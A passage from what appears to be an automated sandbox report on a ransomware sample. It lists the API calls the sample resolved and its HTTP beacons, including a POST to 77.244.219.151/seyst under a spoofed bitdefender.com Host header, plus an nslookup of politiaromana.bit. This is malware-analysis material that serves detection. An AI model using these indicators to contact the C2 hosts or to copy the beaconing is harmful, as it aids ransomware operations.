Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75c07570 True 2
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75c09e30 True 2
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x75c14ff0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x770df730 True 9
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x770dd830 True 4
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x75c09950 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x75c07a50 True 3
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x75c14bf0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x75c07810 True 2
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x75c07600 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x75c0a700 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x75c15100 True 3
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x75c17b30 True 2
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x75c08bf0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x75c07990 True 2
Get Address c:\windows\syswow64\kernel32.dll function = ExitThread, address_out = 0x770e7a80 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x75c03870 True 2
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x75c16630 True 2
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x75c17020 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x75c16c50 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x75c32430 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x75c0ab60 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x75c02af0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x75c01b90 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x75c0a2b0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x75c078b0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x75c02ad0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x75c03880 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x75c07710 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x75c0a6e0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x75c16aa0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x770d0e60 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x75c0a740 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x75c0a720 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x75c16ca0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x75c09b00 True 2
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x75c038a0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x75c023e0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x75c07620 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x75c0aac0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x75c0a7e0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75c0b0b0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x75c09bf0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x75c32670 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x75c0a940 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x75c16730 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75c038c0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x75c0a120 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x75c01b70 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x75c029d0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x75c0a040 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x75c09bc0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x770bf290 True 2
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x770bf210 True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x75c01ba0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x75c0a790 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x75c08500 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x75c15140 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x75c0a290 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x75c07930 True 1
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x75c08c10 True 1
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x75c319a0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x770b2bd0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x770aefe0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x75c07950 True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x770abb20 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x75c09f30 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x75c169b0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x75c16f60 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x75c16f70 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x75c16890 True 2
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x7036c544 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x75c16740 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x75c166a0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x75c16700 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x75c0b040 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x75c0ace0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x770c7dc0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x770d4010 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x770d2a50 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x75c0a7b0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x770d2290 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x770d2910 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x770f7a60 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x770eac00 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x770da890 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x75c0ac80 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x75c30830 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x764c6270 True 1
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x75c0fe80 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x75c0ff80 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x75c30e00 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x75c0a750 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x75c31240 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x75c0ad60 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x75c31460 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x75c09a10 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x7644ded0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x75c03630 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x75c16bb0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x75c16c40 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileAttributesW, address_out = 0x75c16a50 True 1
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x75c0b1d0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x75c2d260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetFileAttributesW, address_out = 0x75c16c20 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexW, address_out = 0x75c166f0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeW, address_out = 0x75c16a10 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VerSetConditionMask, address_out = 0x770e1a40 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x75c16820 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x75c15eb0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSection, address_out = 0x770da200 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x75c09fd0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TerminateThread, address_out = 0x75c10160 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VerifyVersionInfoW, address_out = 0x75c08c30 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WaitForMultipleObjects, address_out = 0x75c16800 True 1
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsW, address_out = 0x75c0cd50 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x75c03690 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleInformation, address_out = 0x75c16660 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x75c0f640 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreatePipe, address_out = 0x75c00540 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiA, address_out = 0x75c07830 True 1
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x75c0d290 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x75c17b50 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x75c16960 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x75c07970 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x75c168e0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x75c169a0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x75c0ac70 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x75c146a0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetDiskFreeSpaceW, address_out = 0x75c169f0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetWindowsDirectoryW, address_out = 0x75c15120 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumeInformationW, address_out = 0x75c16b60 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiW, address_out = 0x75c07590 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x75c09b90 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x75c2d170 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileMappingW, address_out = 0x75c099b0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = UnmapViewOfFile, address_out = 0x75c09b20 True 1
Get Address c:\windows\syswow64\kernel32.dll function = MapViewOfFile, address_out = 0x75c08d60 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSize, address_out = 0x75c16a70 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableW, address_out = 0x75c09970 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x75c0ea30 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x75c099f0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x75c0f5a0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTempPathW, address_out = 0x75c16b30 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75c08c80 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x75c0b000 True 1
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x76148a60 True 1
Get Address c:\windows\syswow64\user32.dll function = wsprintfW, address_out = 0x7613f890 True 1
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x7612d9b0 True 1
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x7612abd0 True 1
Get Address c:\windows\syswow64\user32.dll function = LoadIconW, address_out = 0x7612a740 True 1
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x7618fec0 True 1
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x76144f60 True 1
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x76148a80 True 1
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x73d314e0 True 1
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x76129580 True 1
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x76148e60 True 1
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x76129860 True 1
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x76125d90 True 1
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x761262e0 True 1
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x73d307e0 True 1
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x761383a0 True 1
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x761404a0 True 1
Get Address c:\windows\syswow64\user32.dll function = GetForegroundWindow, address_out = 0x76148cb0 True 1
Get Address c:\windows\syswow64\user32.dll function = SetWindowLongW, address_out = 0x73d31040 True 1
Get Address c:\windows\syswow64\gdi32.dll function = TextOutW, address_out = 0x767b8830 True 1
Get Address c:\windows\syswow64\advapi32.dll function = FreeSid, address_out = 0x76330440 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x7632f7f0 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x7632fa20 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x7632f620 True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptExportKey, address_out = 0x7632fb30 True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x76330590 True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetKeyParam, address_out = 0x76346bf0 True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x76330650 True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x7632faf0 True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x76346b30 True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptGenKey, address_out = 0x76333910 True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyKey, address_out = 0x76330400 True 1
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x76331030 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x7632f330 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x7632f350 True 1
Get Address c:\windows\syswow64\advapi32.dll function = AllocateAndInitializeSid, address_out = 0x7632f660 True 1
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteW, address_out = 0x743dd9f0 True 1
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderPathW, address_out = 0x743ef9c0 True 1
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x743de690 True 1
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x7687d6d0 True 1
Get Address c:\windows\syswow64\crypt32.dll function = CryptBinaryToStringA, address_out = 0x7687e0f0 True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x6fc1d200 True 1
Get Address c:\windows\syswow64\wininet.dll function = HttpAddRequestHeadersW, address_out = 0x6fbcbec0 True 1
Get Address c:\windows\syswow64\wininet.dll function = HttpSendRequestW, address_out = 0x6fc16ef0 True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetConnectW, address_out = 0x6fc045f0 True 1
Get Address c:\windows\syswow64\wininet.dll function = HttpOpenRequestW, address_out = 0x6fbd0fd0 True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x6fc18490 True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x6fbd7320 True 1
Get Address c:\windows\syswow64\psapi.dll function = EnumDeviceDrivers, address_out = 0x75641340 True 1
Get Address c:\windows\syswow64\psapi.dll function = GetDeviceDriverBaseNameW, address_out = 0x756413a0 True 1
Get Address c:\windows\syswow64\ntdll.dll function = RtlComputeCrc32, address_out = 0x7714d9b0 True 5
Get Address c:\windows\syswow64\advapi32.dll function = CryptGenRandom, address_out = 0x763310a0 True 426
Driver (253)
Operation Driver Additional Information Success Count Logfile
Enumerate - load_addresses = 1703688 True 2
Enumerate - load_addresses = 4521984 True 2
Window (249)
Operation Window Name Additional Information Success Count Logfile
Find vetigisoliwomo ki class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga False 249
System (11)
Operation Additional Information Success Count Logfile
Get Computer Name result_out = X2VS1CUM True 1
Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Sleep duration = -1 (infinite) False 1
Get Time type = System Time, time = 1627-01-28 15:07:34 (UTC) True 1
Get Time type = Ticks, time = 131812 True 1
Get Time type = Ticks, time = 141890 True 1
Get Info type = Operating System True 1
Get Info type = Windows Directory, result_out = C:\Windows True 3
Get Info type = Hardware Information True 1
Mutex (1)
Operation Additional Information Success Count Logfile
Create mutex_name = Global\pc_group=WORKGROUP&ransom_id=58de2295a283c81 True 1
Environment (252)
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Get Environment String name = AppData, result_out = C:\Users\Nd9E1FYi\AppData\Roaming True 1
Set Environment String name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo True 249
Ini (250)
Operation Filename Additional Information Success Count Logfile
Read Section Win.ini section_name = hozavofoja xewuwozeyugisehatuzagito cuheleta tofexu, data_out = ˆewè\ÈH False 250
Network Behavior
HTTP Sessions (2)
Information Value
Total Data Sent 566 bytes
Total Data Received 566 bytes
Contacted Host Count 2
Contacted Hosts ipv4bot.whatismyipaddress.com, 77.244.219.151
HTTP Session #1
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name ipv4bot.whatismyipaddress.com
Server Port 80
Data Sent 295
Data Received 14
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Add HTTP Request Headers headers = Host: bitdefender.com True 1
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Read Response size = 10238, size_out = 14 True 1
Read Response size = 10238, size_out = 0 True 1
Close Session - True 4
HTTP Session #2
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name 77.244.219.151
Server Port 80
Data Sent 271
Data Received 552
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Open Connection protocol = HTTP, server_name = 77.244.219.151, server_port = 80 True 1
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = seyst, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Add HTTP Request Headers headers = Host: bitdefender.com True 1
Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 77.244.219.151/seyst True 1
Read Response size = 204798, size_out = 552 True 1
Read Response size = 204798, size_out = 0 True 1
Close Session - True 4
Process #7: nslookup.exe
Information Value
ID #7
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup politiaromana.bit ns1.virmach.ru
Initial Working Directory C:\Users\Nd9E1FYi\Desktop\
Monitor Start Time: 00:00:58, Reason: Child Process
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:02:25
OS Process Information
Information Value
PID 0xb74
Parent PID 0xfd8 (c:\users\nd9e1fyi\appdata\roamingqtp35.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xACC
0xBD4
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00021fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000030000 0x00030000 0x00044fff Pagefile Backed Memory Readable True False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x000cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000000d0000 0x000d0000 0x000d3fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e0fff Pagefile Backed Memory Readable True False False -
private_0x00000000000f0000 0x000f0000 0x000f1fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x0013ffff Private Memory Readable, Writable True False False -
private_0x0000000000140000 0x00140000 0x0017ffff Private Memory Readable, Writable True False False -
private_0x0000000000180000 0x00180000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00190fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000001a0000 0x001a0000 0x001a0fff Private Memory Readable, Writable True False False -
private_0x00000000001b0000 0x001b0000 0x001b0fff Private Memory Readable, Writable True False False -
private_0x0000000000200000 0x00200000 0x003fffff Private Memory Readable, Writable True False False -
locale.nls 0x00400000 0x004bdfff Memory Mapped File Readable False False False -
pagefile_0x00000000004c0000 0x004c0000 0x00647fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000650000 0x00650000 0x007d0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000007e0000 0x007e0000 0x00bdafff Pagefile Backed Memory Readable True False False -
private_0x0000000000e40000 0x00e40000 0x00e41fff Private Memory Readable, Writable True False False -
private_0x0000000000e40000 0x00e40000 0x00e43fff Private Memory Readable, Writable True False False -
private_0x0000000000e70000 0x00e70000 0x00e7ffff Private Memory Readable, Writable True False False -
imm32.dll 0x00e80000 0x00ea9fff Memory Mapped File Readable False False False -
private_0x0000000000fd0000 0x00fd0000 0x010cffff Private Memory Readable, Writable True False False -
nslookup.exe 0x01380000 0x01396fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x00000000013a0000 0x013a0000 0x0539ffff Pagefile Backed Memory - True False False -
pagefile_0x00000000053a0000 0x053a0000 0x0679ffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x067a0000 0x06ad6fff Memory Mapped File Readable False False False -
wow64win.dll 0x5d0b0000 0x5d129fff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x5d130000 0x5d17ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x5d180000 0x5d187fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x6f8c0000 0x6f8cafff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x6f8d0000 0x6f8e3fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x6f8f0000 0x6f905fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x6f910000 0x6f921fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x71770000 0x717b6fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x717c0000 0x717c7fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x717d0000 0x717fefff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x71810000 0x71893fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x718a0000 0x718eefff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73a50000 0x73a6afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73da0000 0x73da9fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73db0000 0x73dcdfff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x741e0000 0x74237fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75650000 0x75693fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x756a0000 0x7575dfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75900000 0x7592afff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75bf0000 0x75ccffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x75ef0000 0x75f9cfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x76110000 0x76256fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76390000 0x7650dfff Memory Mapped File Readable, Writable, Executable False False False -
